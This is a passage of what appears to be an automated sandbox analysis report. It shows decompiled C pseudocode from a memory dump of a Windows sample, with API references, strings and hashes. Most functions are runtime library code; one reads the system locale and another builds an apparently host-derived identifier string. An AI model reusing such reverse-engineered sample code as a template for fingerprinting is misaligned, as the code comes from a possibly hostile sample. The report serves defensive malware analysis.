												_t39 = _t49 + 0x70;
												 *_t39 =  *(_t49 + 0x70) & 0xfffffffd;
												__eflags =  *_t39;
											}
											_t47 = _t78;
											goto L30;
										}
										_t75 = _v16;
										_t69 = _t64 & 0x000000ff;
										_t32 = _t75 + 0x1d; // 0xeb04708d
										_t78 = _t78 + 1;
										_t83 = _t83 + 1;
										__eflags =  *(_t69 + _t32) & 0x00000004;
										if(( *(_t69 + _t32) & 0x00000004) == 0) {
											L26:
											__eflags =  *_t78;
											if( *_t78 != 0) {
												continue;
											}
											goto L27;
										}
										__eflags =  *_t78;
										if( *_t78 == 0) {
											goto L27;
										}
										_t78 = _t78 + 1;
										_t83 = _t83 + 1;
										__eflags = _t83;
										goto L26;
									} else {
										goto L19;
									}
									while(1) {
										L19:
										_t76 =  *_t68;
										__eflags = _t76;
										if(_t76 == 0) {
											goto L33;
										}
										__eflags =  *((intOrPtr*)(_t83 + _t68)) - _t76;
										if( *((intOrPtr*)(_t83 + _t68)) != _t76) {
											goto L22;
										}
										_t68 = _t68 + 1;
										__eflags =  *((char*)(_t83 + _t68));
										if( *((char*)(_t83 + _t68)) != 0) {
											continue;
										}
										goto L22;
									}
									goto L33;
								}
								goto L27;
							}
							 *((intOrPtr*)(E0042FC8F(__eflags))) = 0x16;
							E00431519();
							__eflags = _v8;
							if(_v8 != 0) {
								_t52 = _v12;
								_t24 = _t52 + 0x70;
								 *_t24 =  *(_t52 + 0x70) & 0xfffffffd;
								__eflags =  *_t24;
							}
							_t47 = 0;
							goto L31;
						}
						__eflags = _v8;
						if(_v8 != 0) {
							_t54 = _v12;
							_t18 = _t54 + 0x70;
							 *_t18 =  *(_t54 + 0x70) & 0xfffffffd;
							__eflags =  *_t18;
						}
						return _a4;
					} else {
						 *((intOrPtr*)(E0042FC8F(__eflags))) = 0x16;
						E00431519();
						__eflags = _v8;
						if(_v8 != 0) {
							_t58 = _v12;
							_t14 = _t58 + 0x70;
							 *_t14 =  *(_t58 + 0x70) & 0xfffffffd;
							__eflags =  *_t14;
						}
						__eflags = 0;
						return 0;
					}
				} else {
					_t59 = E004333B0(_a4, _a8);
					if(_v8 == 0) {
						return _t59;
					} else {
						 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
						return _t59;
					}
				}
			}

0x0042cb73
0x0042cb7f
0x0042cba1
0x0042cba4
0x0042cba6
0x0042cbc9
0x0042cbcc
0x0042cbe1
0x0042cbe4
0x0042cbe6
0x0042cc0a
0x0042cc0c
0x0042cc0e
0x0042cc1e
0x0042cc20
0x0042cc24
0x0042cc6a
0x0042cc6a
0x0042cc6e
0x0042cc70
0x0042cc73
0x0042cc73
0x0042cc73
0x0042cc73
0x0042cc77
0x0042cc77
0x0042cc79
0x0042cc7b
0x00000000
0x0042cc7b
0x0042cc26
0x0042cc26
0x0042cc29
0x0042cc29
0x0042cc2b
0x00000000
0x00000000
0x0042cc2d
0x0042cc2f
0x0042cc32
0x0042cc34
0x0042cc48
0x0042cc48
0x0042cc4b
0x0042cc7e
0x0042cc7e
0x0042cc82
0x0042cc84
0x0042cc87
0x0042cc87
0x0042cc87
0x0042cc87
0x0042cc8b
0x00000000
0x0042cc8b
0x0042cc4d
0x0042cc50
0x0042cc53
0x0042cc57
0x0042cc58
0x0042cc59
0x0042cc5c
0x0042cc65
0x0042cc65
0x0042cc68
0x00000000
0x00000000
0x00000000
0x0042cc68
0x0042cc5e
0x0042cc61
0x00000000
0x00000000
0x0042cc63
0x0042cc64
0x0042cc64
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cc36
0x0042cc36
0x0042cc36
0x0042cc38
0x0042cc3a
0x00000000
0x00000000
0x0042cc3c
0x0042cc3f
0x00000000
0x00000000
0x0042cc41
0x0042cc42
0x0042cc46
0x00000000
0x00000000
0x00000000
0x0042cc46
0x00000000
0x0042cc36
0x00000000
0x0042cc29
0x0042cbed
0x0042cbf3
0x0042cbf8
0x0042cbfc
0x0042cbfe
0x0042cc01
0x0042cc01
0x0042cc01
0x0042cc01
0x0042cc05
0x00000000
0x0042cc05
0x0042cbce
0x0042cbd2
0x0042cbd4
0x0042cbd7
0x0042cbd7
0x0042cbd7
0x0042cbd7
0x0042cbdf
0x0042cba8
0x0042cbad
0x0042cbb3
0x0042cbb8
0x0042cbbc
0x0042cbbe
0x0042cbc1
0x0042cbc1
0x0042cbc1
0x0042cbc1
0x0042cbc5
0x0042cbc8
0x0042cbc8
0x0042cb81
0x0042cb87
0x0042cb92
0x0042cc7d
0x0042cb98
0x0042cb9b
0x0042cba0
0x0042cba0
0x0042cb92

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042CB73

Part of subcall function 0042C9F1: __getptd.LIBCMT ref: 0042CA04

Strings

Jp@, xrefs: 0042CB67
$h, xrefs: 0042CB87

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___getptd
String ID: Jp@$$h
API String ID: 3914705266-1229018547
Opcode ID: a8974c28ffee0fcd268c4d0584b69b3f55dabffd0677bd22beb971176b38fc24
Instruction ID: edf06663c56db81d52dadb4e195d9b7255ebfad11f8fba51f0fd11f65258e5df
Opcode Fuzzy Hash: a8974c28ffee0fcd268c4d0584b69b3f55dabffd0677bd22beb971176b38fc24
Instruction Fuzzy Hash: C4412071B042546FEF229B39E4C57AE7FA09F02324F5841DAD4A55B2E1D7388D85C748

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041FF70(char* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v190;
				char _v192;
				intOrPtr _v200;
				char _v204;
				char _v220;
				intOrPtr _v228;
				char _v232;
				char _v248;
				intOrPtr _v256;
				char _v260;
				char _v276;
				char _v277;
				char _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t43;
				void* _t48;
				void* _t51;
				void* _t61;
				intOrPtr _t65;
				intOrPtr _t84;
				char* _t86;
				intOrPtr _t87;
				signed int _t88;
				void* _t89;
				void* _t91;
				void* _t92;

				_push(0xffffffff);
				_push(E0043F601);
				_push( *[fs:0x0]);
				_t42 =  *0x451f00; // 0xc21d6f0a
				_t43 = _t42 ^ _t88;
				_v20 = _t43;
				_push(_t43);
				 *[fs:0x0] =  &_v16;
				_t86 = _a4;
				_v284 = 0;
				_v200 = 0xf;
				_v204 = 0;
				_v220 = 0;
				_v8 = 0;
				_v192 = 0;
				E0042A2F0( &_v190, 0, 0xa8);
				_t91 = _t89 - 0x10c + 0xc;
				_push(0x55);
				_t79 =  &_v192;
				_push( &_v192);
				if( *0x464754() != 0) {
					_v228 = 7;
					_v232 = 0;
					_v248 = 0;
					_t48 = E0042DEE3( &_v192);
					_t92 = _t91 + 4;
					E0041F350( &_v248,  &_v192, _t48);
					_v8 = 1;
					_t51 = E004238C0( &_v277,  &_v276,  &_v248);
					_v8 = 2;
					E00404D00( &_v220, _t51);
					if(_v256 >= 0x10) {
						_push(_v276);
						E0042A289();
						_t92 = _t92 + 4;
					}
					_v256 = 0xf;
					_v260 = 0;
					_v276 = 0;
					_v8 = 0;
					if(_v228 >= 8) {
						_push(_v248);
						E0042A289();
						_t92 = _t92 + 4;
					}
					_t79 =  &_v220;
					 *((intOrPtr*)(_t86 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t86 + 0x10)) = 0;
					 *_t86 = 0;
					E00404D00(_t86,  &_v220);
				} else {
					 *((intOrPtr*)(_t86 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t86 + 0x10)) = 0;
					 *_t86 = 0;
					_t61 = E0042BC70("Unknown");
					_t92 = _t91 + 4;
					E00404BC0(_t86, "Unknown", _t61);
				}
				if(_v200 >= 0x10) {
					_push(_v220);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t84);
				_pop(_t87);
				_pop(_t65);
				return E0042A36A(_t86, _t65, _v20 ^ _t88, _t79, _t84, _t87);
			}

0x0041ff73
0x0041ff75
0x0041ff80
0x0041ff87
0x0041ff8c
0x0041ff8e
0x0041ff94
0x0041ff98
0x0041ff9e
0x0041ffa8
0x0041ffae
0x0041ffb4
0x0041ffba
0x0041ffcf
0x0041ffd2
0x0041ffd9
0x0041ffde
0x0041ffe1
0x0041ffe3
0x0041ffe9
0x0041fff2
0x00420024
0x0042002e
0x00420034
0x0042003b
0x00420040
0x00420051
0x0042006a
0x0042006e
0x0042007a
0x0042007e
0x0042008a
0x00420092
0x00420093
0x00420098
0x00420098
0x004200a2
0x004200a8
0x004200ae
0x004200b4
0x004200b7
0x004200bf
0x004200c0
0x004200c5
0x004200c5
0x004200c8
0x004200ce
0x004200d1
0x004200d7
0x004200d9
0x0041fff4
0x0041fff4
0x0041fff7
0x0041ffff
0x00420001
0x00420006
0x00420011
0x00420011
0x004200e5
0x004200ed
0x004200ee
0x004200f3
0x004200fb
0x00420103
0x00420104
0x00420105
0x00420113

APIs

_memset.LIBCMT ref: 0041FFD9
GetUserDefaultLocaleName.KERNEL32(?,00000055,?,00000010,?), ref: 0041FFEA
_strlen.LIBCMT ref: 00420001
_wcslen.LIBCMT ref: 0042003B

Strings

Unknown, xrefs: 0041FFFA, 0042000A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: DefaultLocaleNameUser_memset_strlen_wcslen
String ID: Unknown
API String ID: 1079853558-1654365787
Opcode ID: b5beddcecd3ade57e99de69dd022f1b3bb558093b1c89461d7f7c0daf5f8993d
Instruction ID: 88c562e1befefbc09cd8ae1a8e04a1017918f7506af4e1b3cfb68fe14194d3e8
Opcode Fuzzy Hash: b5beddcecd3ade57e99de69dd022f1b3bb558093b1c89461d7f7c0daf5f8993d
Instruction Fuzzy Hash: 094190B1D00268DADB24DF55EC41BDEF7B4EF44304F4045EEE50AA3241EB795A888F6A

Uniqueness

Uniqueness Score: -1.00%

Function 00404710 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404710(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t23;
				char* _t28;
				intOrPtr _t32;
				signed int _t34;
				intOrPtr _t37;
				intOrPtr* _t38;
				intOrPtr* _t43;
				intOrPtr _t45;
				intOrPtr* _t50;

				_t43 = _a4;
				_t18 =  *((intOrPtr*)(_t43 + 0x10));
				_t50 = __ecx;
				_t34 = _a8;
				if(_t18 < _t34) {
					_t18 = E004297E6("invalid string position");
				}
				_t32 = _a12;
				_t19 = _t18 - _t34;
				if(_t19 < _t32) {
					_t32 = _t19;
				}
				_t20 =  *((intOrPtr*)(_t50 + 0x10));
				if((_t34 | 0xffffffff) - _t20 <= _t32) {
					_t20 = E00429799("string too long");
				}
				if(_t32 == 0) {
					L25:
					return _t50;
				} else {
					_t45 = _t20 + _t32;
					if(_t45 > 0xfffffffe) {
						_t20 = E00429799("string too long");
					}
					_t37 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t37 >= _t45) {
						if(_t45 != 0) {
							goto L11;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
							if(_t37 < 0x10) {
								_t28 = _t50;
								 *_t28 = 0;
								return _t28;
							} else {
								 *((char*)( *_t50)) = 0;
								return _t50;
							}
						}
					} else {
						E004044F0(_t50, _t45, _t20);
						_t43 = _a4;
						if(_t45 == 0) {
							L24:
							goto L25;
						} else {
							L11:
							if( *((intOrPtr*)(_t43 + 0x14)) < 0x10) {
								_t38 = _t43;
							} else {
								_t38 =  *_t43;
							}
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								_t23 = _t50;
							} else {
								_t23 =  *_t50;
							}
							E0042B8D0( *((intOrPtr*)(_t50 + 0x10)) + _t23, _t38 + _a8, _t32);
							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t45)) = 0;
								goto L24;
							} else {
								 *((char*)( *_t50 + _t45)) = 0;
								return _t50;
							}
						}
					}
				}
			}

0x00404713
0x00404716
0x0040471b
0x0040471d
0x00404722
0x00404729
0x00404729
0x0040472e
0x00404731
0x00404735
0x00404737
0x00404737
0x00404739
0x00404743
0x0040474a
0x0040474a
0x00404751
0x004047f4
0x004047f9
0x00404757
0x00404758
0x0040475e
0x00404765
0x00404765
0x0040476a
0x0040476f
0x00404791
0x00000000
0x00404793
0x00404793
0x00404799
0x004047aa
0x004047ad
0x004047b2
0x0040479b
0x0040479e
0x004047a6
0x004047a6
0x00404799
0x00404771
0x00404775
0x0040477a
0x0040477f
0x004047f3
0x00000000
0x00404781
0x00404781
0x00404789
0x004047b5
0x0040478b
0x0040478b
0x0040478b
0x004047ba
0x004047c0
0x004047bc
0x004047bc
0x004047bc
0x004047cd
0x004047d9
0x004047dc
0x004047ef
0x00000000
0x004047de
0x004047e0
0x004047ea
0x004047ea
0x004047dc
0x0040477f
0x0040476f

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404729

Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 004297FB
Part of subcall function 004297E6: __CxxThrowException@8.LIBCMT ref: 00429810
Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 00429821

std::_Xinvalid_argument.LIBCPMT ref: 0040474A
std::_Xinvalid_argument.LIBCPMT ref: 00404765

Strings

string too long, xrefs: 00404745, 00404760
invalid string position, xrefs: 00404724

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 4225265588-4289949731
Opcode ID: 88fb77e882760ee52d18709ae34e4de331909701f3b375f43f1572fbf2925b9c
Instruction ID: 333b10fc5887aa90611193914e62a5e1ff7113bf0bef86fcddd7d7e9c7da3c7d
Opcode Fuzzy Hash: 88fb77e882760ee52d18709ae34e4de331909701f3b375f43f1572fbf2925b9c
Instruction Fuzzy Hash: 1C319AB63002118BD724DE6CE980A6AF3E5EBD6725B100A3FE651DB7C1D774DC4087A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041F9C9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041F9C9(signed char* __edi, void* __esi, void* __eflags) {
				void* __ebx;
				void* _t114;
				signed char _t116;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;
				void* _t123;
				signed char* _t124;
				signed char _t150;
				signed char _t151;
				signed char _t155;
				intOrPtr _t159;
				void* _t161;
				signed char* _t166;
				signed char* _t167;
				signed char* _t197;
				intOrPtr _t198;
				void* _t199;
				CHAR* _t200;
				signed char* _t201;
				signed char* _t203;
				intOrPtr _t204;
				signed char _t205;
				signed int _t206;
				void* _t208;
				void* _t209;
				void* _t210;
				signed char _t219;

				_t199 = __esi;
				_t197 = __edi;
				do {
					 *((char*)(_t206 + _t199 - 0x138)) = E00420420(_t206 - 0x1dc);
					_t199 = _t199 + 1;
					_t208 = _t208 + 4;
				} while (_t199 < 8);
				_t200 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				if(_t200 != 0) {
					wsprintfA(_t200, "%08lX%04lX%lu-",  *((intOrPtr*)(_t206 - 0x140)),  *(_t206 - 0x13c) & 0x0000ffff,  *((intOrPtr*)(_t206 - 0x136)));
					_t114 = E0042BC70(_t200);
					_t209 = _t208 + 0x18;
					E0040A4B0(_t206 - 0x130, _t200, _t114);
					_t116 =  *(_t206 - 0x11c);
					_t201 =  *(_t206 - 0x130);
					if(_t116 < 0x10) {
						 *(_t206 - 0x1e8) = _t206 - 0x130;
					} else {
						 *(_t206 - 0x1e8) = _t201;
					}
					_t166 = _t201;
					if(_t116 < 0x10) {
						_t166 = _t206 - 0x130;
					}
					_t167 =  &(_t166[ *(_t206 - 0x120)]);
					 *(_t206 - 0x1e4) = _t167;
					if(_t116 < 0x10) {
						_t201 = _t206 - 0x130;
					}
					if(_t201 == _t167) {
						L33:
						_t117 = E0041F540(0, _t197, _t206 - 0x1d8); // executed
						 *((char*)(_t206 - 4)) = 1;
						_t118 = E0040D070(_t117, _t206 - 0x1bc, 0x14, 0x11);
						 *((char*)(_t206 - 4)) = 2;
						_t120 = E0041F5C0(0, _t197, _t206 - 0x1a0); // executed
						 *((char*)(_t206 - 4)) = 3;
						_t121 = E0040D070(_t120, _t206 - 0x184, 0, 0x18);
						 *((char*)(_t206 - 4)) = 4;
						_t123 = E0041F890(_t120, _t206 - 0x168, _t206 - 0x130, _t121);
						 *((char*)(_t206 - 4)) = 5;
						_t124 = E00404E00(_t206 - 0x14c, _t206 - 0x14c, _t123, _t118);
						_t210 = _t209 + 0x18;
						_t203 = _t124;
						if(_t206 - 0x130 != _t203) {
							if( *(_t206 - 0x11c) >= 0x10) {
								_push( *(_t206 - 0x130));
								E0042A289();
								_t210 = _t210 + 4;
							}
							 *(_t206 - 0x11c) = 0xf;
							 *(_t206 - 0x120) = 0;
							 *(_t206 - 0x130) = 0;
							if(_t203[0x14] >= 0x10) {
								 *(_t206 - 0x130) =  *_t203;
								 *_t203 = 0;
							} else {
								E0042C040(_t206 - 0x130, _t203, _t203[0x10] + 1);
								_t210 = _t210 + 0xc;
							}
							 *(_t206 - 0x120) = _t203[0x10];
							 *(_t206 - 0x11c) = _t203[0x14];
							_t203[0x10] = 0;
							_t203[0x14] = 0;
						}
						if( *(_t206 - 0x138) >= 0x10) {
							_push( *((intOrPtr*)(_t206 - 0x14c)));
							E0042A289();
							_t210 = _t210 + 4;
						}
						 *(_t206 - 0x138) = 0xf;
						 *(_t206 - 0x13c) = 0;
						 *((char*)(_t206 - 0x14c)) = 0;
						if( *(_t206 - 0x154) >= 0x10) {
							_push( *((intOrPtr*)(_t206 - 0x168)));
							E0042A289();
							_t210 = _t210 + 4;
						}
						 *(_t206 - 0x154) = 0xf;
						 *((intOrPtr*)(_t206 - 0x158)) = 0;
						 *((char*)(_t206 - 0x168)) = 0;
						if( *(_t206 - 0x170) >= 0x10) {
							_push( *((intOrPtr*)(_t206 - 0x184)));
							E0042A289();
							_t210 = _t210 + 4;
						}
						 *(_t206 - 0x170) = 0xf;
						 *((intOrPtr*)(_t206 - 0x174)) = 0;
						 *((char*)(_t206 - 0x184)) = 0;
						if( *(_t206 - 0x18c) >= 0x10) {
							_push( *((intOrPtr*)(_t206 - 0x1a0)));
							E0042A289();
							_t210 = _t210 + 4;
						}
						 *(_t206 - 0x18c) = 0xf;
						 *((intOrPtr*)(_t206 - 0x190)) = 0;
						 *((char*)(_t206 - 0x1a0)) = 0;
						if( *(_t206 - 0x1a8) >= 0x10) {
							_push( *((intOrPtr*)(_t206 - 0x1bc)));
							E0042A289();
							_t210 = _t210 + 4;
						}
						 *(_t206 - 0x1a8) = 0xf;
						 *((intOrPtr*)(_t206 - 0x1ac)) = 0;
						 *((char*)(_t206 - 0x1bc)) = 0;
						if( *((intOrPtr*)(_t206 - 0x1c4)) >= 0x10) {
							_push( *((intOrPtr*)(_t206 - 0x1d8)));
							E0042A289();
							_t210 = _t210 + 4;
						}
						_t188 = _t206 - 0x130;
						_t197[0x14] = 0xf;
						_t197[0x10] = 0;
						 *_t197 = 0;
						if(_t197 == _t206 - 0x130) {
							goto L15;
						} else {
							if(_t197[0x14] >= 0x10) {
								_push( *_t197);
								E0042A289();
								_t210 = _t210 + 4;
							}
							_t197[0x14] = 0xf;
							_t197[0x10] = 0;
							 *_t197 = 0;
							if( *(_t206 - 0x11c) >= 0x10) {
								_t188 =  *(_t206 - 0x11c);
								 *_t197 =  *(_t206 - 0x130);
								_t197[0x10] =  *(_t206 - 0x120);
								_t197[0x14] =  *(_t206 - 0x11c);
							} else {
								E0042C040(_t197, _t206 - 0x130,  *(_t206 - 0x120) + 1);
								_t188 =  *(_t206 - 0x11c);
								_t197[0x10] =  *(_t206 - 0x120);
								_t197[0x14] =  *(_t206 - 0x11c);
							}
							goto L17;
						}
					} else {
						_t161 =  *(_t206 - 0x1e8) - _t201;
						do {
							_t201[_t161] = E0042E013( *_t201 & 0x000000ff);
							_t201 =  &(_t201[1]);
							_t209 = _t209 + 4;
						} while (_t201 !=  *(_t206 - 0x1e4));
						goto L33;
					}
				} else {
					__edi[0x14] = 0xf;
					__edi[0x10] = 0;
					 *__edi = 0;
					_t205 = E0042BC70(0);
					_t210 = _t208 + 4;
					if(_t205 > 0xfffffffe) {
						E00429799("string too long");
					}
					_t150 = _t197[0x14];
					if(_t150 >= _t205) {
						if(_t205 != 0) {
							goto L7;
						}
						_t197[0x10] = 0;
						if(_t150 < 0x10) {
							_t155 = _t197;
						} else {
							_t155 =  *_t197;
						}
						 *_t155 = 0;
						goto L15;
					} else {
						_t188 = _t197[0x10];
						E004044F0(_t197, _t205, _t197[0x10]);
						_t219 = _t205;
						L7:
						if(_t219 > 0) {
							if(_t197[0x14] < 0x10) {
								_t151 = _t197;
							} else {
								_t151 =  *_t197;
							}
							E0042B8D0(_t151, 0, _t205);
							_t210 = _t210 + 0xc;
							_t197[0x10] = _t205;
							if(_t197[0x14] < 0x10) {
								_t197[_t205] = 0;
							} else {
								 *((char*)( *_t197 + _t205)) = 0;
							}
						}
						L15:
						if( *(_t206 - 0x11c) >= 0x10) {
							_push( *(_t206 - 0x130));
							E0042A289();
						}
						L17:
						 *[fs:0x0] =  *((intOrPtr*)(_t206 - 0xc));
						_pop(_t198);
						_pop(_t204);
						_pop(_t159);
						return E0042A36A(_t197, _t159,  *(_t206 - 0x10) ^ _t206, _t188, _t198, _t204);
					}
				}
			}

0x0041f9c9
0x0041f9c9
0x0041f9d0
0x0041f9dc
0x0041f9e3
0x0041f9e4
0x0041f9e7
0x0041f9ff
0x0041fa03
0x0041fae0
0x0041fae7
0x0041faec
0x0041faf7
0x0041fafc
0x0041fb02
0x0041fb0b
0x0041fb1b
0x0041fb0d
0x0041fb0d
0x0041fb0d
0x0041fb21
0x0041fb26
0x0041fb28
0x0041fb28
0x0041fb2e
0x0041fb34
0x0041fb3d
0x0041fb3f
0x0041fb3f
0x0041fb47
0x0041fb6b
0x0041fb78
0x0041fb8a
0x0041fb8e
0x0041fba2
0x0041fba6
0x0041fbb7
0x0041fbbb
0x0041fbcf
0x0041fbd3
0x0041fbe1
0x0041fbe5
0x0041fbea
0x0041fbed
0x0041fbf7
0x0041fc00
0x0041fc08
0x0041fc09
0x0041fc0e
0x0041fc0e
0x0041fc11
0x0041fc1b
0x0041fc21
0x0041fc2c
0x0041fc47
0x0041fc4d
0x0041fc2e
0x0041fc3b
0x0041fc40
0x0041fc40
0x0041fc52
0x0041fc5b
0x0041fc61
0x0041fc64
0x0041fc64
0x0041fc6e
0x0041fc76
0x0041fc77
0x0041fc7c
0x0041fc7c
0x0041fc86
0x0041fc90
0x0041fc96
0x0041fc9d
0x0041fca5
0x0041fca6
0x0041fcab
0x0041fcab
0x0041fcb5
0x0041fcbf
0x0041fcc5
0x0041fccc
0x0041fcd4
0x0041fcd5
0x0041fcda
0x0041fcda
0x0041fce4
0x0041fcee
0x0041fcf4
0x0041fcfb
0x0041fd03
0x0041fd04
0x0041fd09
0x0041fd09
0x0041fd13
0x0041fd1d
0x0041fd23
0x0041fd2a
0x0041fd32
0x0041fd33
0x0041fd38
0x0041fd38
0x0041fd42
0x0041fd4c
0x0041fd52
0x0041fd59
0x0041fd61
0x0041fd62
0x0041fd67
0x0041fd67
0x0041fd6a
0x0041fd70
0x0041fd77
0x0041fd7a
0x0041fd7f
0x00000000
0x0041fd85
0x0041fd89
0x0041fd8d
0x0041fd8e
0x0041fd93
0x0041fd93
0x0041fd96
0x0041fd9d
0x0041fda0
0x0041fdaa
0x0041fde7
0x0041fded
0x0041fdef
0x0041fdf2
0x0041fdac
0x0041fdbc
0x0041fdc7
0x0041fdd0
0x0041fdd3
0x0041fdd3
0x00000000
0x0041fdaa
0x0041fb49
0x0041fb4f
0x0041fb51
0x0041fb5a
0x0041fb5d
0x0041fb5e
0x0041fb61
0x00000000
0x0041fb69
0x0041fa09
0x0041fa09
0x0041fa10
0x0041fa14
0x0041fa1c
0x0041fa1e
0x0041fa24
0x0041fa2b
0x0041fa2b
0x0041fa30
0x0041fa35
0x0041fa53
0x00000000
0x00000000
0x0041fa55
0x0041fa5b
0x0041fa61
0x0041fa5d
0x0041fa5d
0x0041fa5d
0x0041fa63
0x00000000
0x0041fa37
0x0041fa37
0x0041fa3e
0x0041fa43
0x0041fa45
0x0041fa45
0x0041fa4b
0x0041fa9e
0x0041fa4d
0x0041fa4d
0x0041fa4d
0x0041faa3
0x0041faa8
0x0041faaf
0x0041fab2
0x0041fabe
0x0041fab4
0x0041fab6
0x0041fab6
0x0041fab2
0x0041fa66
0x0041fa6d
0x0041fa75
0x0041fa76
0x0041fa7b
0x0041fa7e
0x0041fa83
0x0041fa8b
0x0041fa8c
0x0041fa8d
0x0041fa9b
0x0041fa9b
0x0041fa35

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000010,?), ref: 0041F9F2
HeapAlloc.KERNEL32(00000000,?,?,00000010,?), ref: 0041F9F9
_strlen.LIBCMT ref: 0041FA17
std::_Xinvalid_argument.LIBCPMT ref: 0041FA2B

Strings

string too long, xrefs: 0041FA26

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Heap$AllocProcessXinvalid_argument_strlenstd::_
String ID: string too long
API String ID: 275019763-2556327735
Opcode ID: abcdd4c1f767c1c7795056ae59581a9d20c3c85c476d6a34f9fb6faa208334f2
Instruction ID: 149c4e6897ed79b97d3aaf6ecf393c4785e13e30a8fbe6f4957e6005cf70dba3
Opcode Fuzzy Hash: abcdd4c1f767c1c7795056ae59581a9d20c3c85c476d6a34f9fb6faa208334f2
Instruction Fuzzy Hash: 762104B1A002119BDB24EF68A88179AB3A4FF40358F00067FE91A53341D77DADD5C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00418770(intOrPtr __ecx, char* _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v32;
				void* __ebx;
				void* __esi;
				signed int _t21;
				char* _t25;
				void* _t38;
				intOrPtr _t40;
				signed int _t42;

				_push(0xffffffff);
				_push(E0043EC94);
				_push( *[fs:0x0]);
				_t21 =  *0x451f00; // 0xc21d6f0a
				_push(_t21 ^ _t42);
				 *[fs:0x0] =  &_v16;
				_t40 = __ecx;
				_v20 = __ecx;
				E00429A1B(__ecx, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((char*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((char*)(__ecx + 0x20)) = 0;
				_t25 = _a4;
				_v8 = 4;
				_t46 = _t25;
				if(_t25 == 0) {
					_a4 = "bad locale name";
					E0042BF4E( &_v32,  &_a4);
					_v32 = 0x445dd0;
					_t25 = E0042C5C1( &_v32, 0x44bf64);
				}
				E00429C37(0, _t38, _t40, _t46, _t40, _t25);
				 *[fs:0x0] = _v16;
				return _t40;
			}

0x00418773
0x00418775
0x00418780
0x00418786
0x0041878d
0x00418791
0x00418797
0x00418799
0x0041879f
0x004187a4
0x004187a7
0x004187aa
0x004187ad
0x004187b0
0x004187b3
0x004187b6
0x004187b9
0x004187bc
0x004187bf
0x004187c2
0x004187c6
0x004187c8
0x004187d1
0x004187d8
0x004187e6
0x004187ed
0x004187ed
0x004187f4
0x00418801
0x0041880e

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0041879F
std::exception::exception.LIBCMT ref: 004187D8

Part of subcall function 0042BF4E: std::exception::_Copy_str.LIBCMT ref: 0042BF69

__CxxThrowException@8.LIBCMT ref: 004187ED

Part of subcall function 0042C5C1: RaiseException.KERNEL32(?,?,0042C5C0,?,?,?,?,?,0042C5C0,?,0044B220,00464BA8), ref: 0042C603

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004187F4

Strings

bad locale name, xrefs: 004187D1

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

